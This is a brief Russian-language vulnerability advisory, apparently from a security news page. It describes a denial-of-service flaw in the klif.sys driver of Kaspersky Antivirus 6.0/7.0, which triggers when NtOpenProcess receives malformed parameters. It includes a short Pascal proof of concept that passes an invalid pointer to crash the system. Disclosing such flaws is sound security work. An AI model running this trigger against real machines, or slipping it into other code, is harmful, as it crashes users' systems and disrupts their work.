• Партнер

  • Программа: Kaspersky Antivirus 6.0/7.0

    Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в драйвере klif.sys при обработке NtOpenProcess с некорректными параметрами.
    Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.

    Пример на языке Pascal:

    var
      ob1: OBJECT_ATTRIBUTES;
      p1: DWORD;
    begin
      ob1.Length := sizeof(ob1);
      NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
    end;

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии